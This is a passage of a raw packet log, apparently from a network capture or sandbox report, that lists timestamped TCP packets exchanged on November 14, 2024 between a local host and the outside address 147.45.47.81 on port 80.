                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813726902 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813740015 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813747883 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813800097 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813800097 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813800097 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813931942 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813942909 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813951969 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813961983 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813971996 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813981056 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813990116 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813990116 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813994884 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814004898 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814014912 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814023018 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814032078 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814039946 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814047098 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814047098 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814047098 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814049959 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814083099 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814093113 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814100981 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814110994 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814120054 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814122915 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814122915 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814131021 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814141035 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814151049 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814162016 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814171076 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814179897 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814189911 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814203024 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814203024 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814203024 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814218998 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814245939 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814255953 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814265966 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814282894 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814291000 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814299107 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814299107 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814299107 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814301014 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814312935 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814338923 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814347982 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814347982 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814347982 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814361095 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814371109 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814379930 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814388990 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814414978 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814425945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814436913 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814452887 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814462900 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814467907 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814470053 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814470053 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814472914 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814496040 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814508915 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814538002 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814548969 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814559937 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814568996 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814579010 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814589024 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814598083 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814603090 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814609051 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814619064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814621925 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814627886 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814636946 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814655066 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814656973 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814671993 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814676046 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814682961 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814692020 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814701080 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814707994 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814709902 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814721107 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814728022 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814732075 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814742088 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814752102 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814758062 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814763069 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814771891 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814778090 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814781904 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814795971 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814811945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814815998 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814827919 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814840078 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814851046 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814861059 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814871073 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814877033 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814881086 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814904928 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814905882 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814920902 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814929962 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814948082 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814950943 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814958096 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814968109 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814976931 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814985991 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814992905 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.814996004 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815005064 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815006018 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815016985 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815037966 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815045118 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815057039 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815066099 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815076113 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815084934 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815087080 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815097094 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815107107 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815114975 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815115929 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815128088 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815136909 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815138102 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815148115 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815156937 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815166950 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815175056 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815176964 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815186977 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815196037 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815205097 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815206051 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815215111 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815222979 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815226078 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815232038 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815241098 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815247059 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815251112 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815258026 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815294027 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815367937 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815378904 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815387011 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815412045 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815417051 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815442085 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815443039 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815454006 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815463066 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815474033 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815476894 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815485001 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815495014 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815502882 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815505028 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815685034 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.815685034 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.816020966 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.817984104 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.817997932 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818010092 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818020105 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818032026 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818042994 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818053007 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818088055 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818088055 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818125963 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818140030 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818142891 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818152905 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818165064 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818240881 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818252087 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818263054 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818274021 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818284988 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818293095 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818293095 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818293095 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818315983 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818327904 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818337917 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818350077 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818361044 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818372011 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818376064 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818376064 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818384886 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818397045 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818408012 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818434000 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818458080 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818474054 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818485975 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818495989 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818506002 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818506002 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818506002 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818506002 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818519115 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818530083 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818541050 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818551064 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818562031 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818572044 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818584919 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818584919 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818598986 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818604946 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818627119 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818658113 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818669081 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818669081 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818669081 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818681002 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818692923 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818703890 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818713903 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818726063 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818742990 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818753958 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818761110 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818761110 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818761110 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.818798065 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819025040 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819037914 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819047928 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819057941 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819071054 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819081068 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819092989 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819102049 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819113016 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819133997 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819166899 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819250107 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819340944 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819360018 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819370985 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819382906 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819405079 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819417000 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819423914 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819423914 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819427013 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819438934 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819451094 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819461107 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819472075 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819478035 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819478035 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819484949 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819497108 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819508076 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819518089 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819529057 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819539070 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819586039 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819586039 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.819586039 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824071884 CET8049958147.45.47.81192.168.2.10
